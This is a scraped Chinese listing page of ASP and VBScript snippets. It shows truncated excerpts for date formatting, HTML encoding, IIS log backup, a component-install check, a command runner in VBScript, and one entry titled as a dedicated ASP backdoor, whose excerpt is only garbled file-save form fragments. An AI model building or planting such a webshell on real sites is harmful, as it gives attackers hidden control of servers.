resume 相关的软件列表

首页

很不错的一个UBB代码

2020-02-16 标签:很不错,ubb,代码,function,htmlencode,byval,strvalue,忽略,错误,error,resume,next,定义,变量,dim,strnewvalue,replace,vbcrlf,br,end

"" ThenstrNewValue = Replace(strValue,"",">")strNewValue = Replace(strNewValue,"'","")strNewValue = Replace(strNewValue,"""",""")strNewValue = Rep

asp 将日期格式化为需要的格式
ASP

asp 将日期格式化为需要的格式

2020-02-16 标签:asp,日期,格式化,需要,格式,函数,formatdate,dateandtime,para,参数,时间,样式,作者,阿里,西西,2007,12,描述,示例

'****************************** Public Function FormatDate(DateAndTime, para)On Error Resume NextDim y, m, d, h, mi, s, strDateTimeFormatDate = DateA

七步倒┈→专用asp后门
ASP

七步倒┈→专用asp后门

2020-02-16 标签:七步,专用,asp,后门,html,head,title,dim,objfso,fdata,error,resume,n,ext,set,server,scripting

七步倒┈→专用asp后门 "" then%> Save Success!"%> Save UnSuccess!"%> "%> save file绝对路径:"%> "%> "%> file of 绝对路径"%>

定时自动备份IIS的WWW日志的VBScript脚本
VB

定时自动备份IIS的WWW日志的VBScript脚本

2020-02-16 标签:定时,自动,备份,iis,www,日志,vbs,脚本,dim,iiscount,iisobject,logfiledir,fso,inputtime,site,sites,i,j,sitename

dim IISCount,IISObject,logfiledir,fso,LogFilePeriods,inputtime,site,sites,i,j,sitename(999),WshShell 'on error resume next set WshShell = WScript.Crea

用VBScript实现cmd功能
VB

用VBScript实现cmd功能

2020-02-16 标签:vbs,实现,cmd,功能,error,resume,n,ext,d,520,inputbox,输入,命令,多个,连接,关闭,vb,窗口,set

on error resume next do while d<>"520" d=inputbox("请输入命令,多个命令用&连接。关闭该VB窗口命令520") set q=createobject("scripting.filesystemobject") set a=WScr

asp代码实现检测组件是否安装的函数
ASP

asp代码实现检测组件是否安装的函数

2020-02-16 标签:asp,代码,实现,检测,组件,是否,安装,函数,参数,对象,作者,阿里,西西,日期,2007,13

'****************************** Function IsObjInstalled(strClassString)On Error Resume NextIsObjInstalled = False'Err = 0Dim xTestObjSet xTestObj = S